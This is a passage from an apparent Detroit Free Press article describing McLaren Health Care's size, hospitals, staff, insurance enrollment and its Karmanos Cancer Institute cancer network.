The $6.6 billion health system includes 13 hospitals, ambulatory surgery centers and imaging centers, along with pharmacy services and a clinical laboratory network. McLaren employs 28,000 people and more than 113,000 network providers throughout Michigan, Indiana and Ohio and runs commercial and Medicaid health insurance plans, which enroll 732,838 people in Michigan and Indiana.

McLaren says on its website that it "operates Michigan’s largest network of cancer centers and providers, anchored by the Karmanos Cancer Institute." Karmanos treats 14,000 new cancer patients each year.

Contact Kristen Shamus at the Free Press.
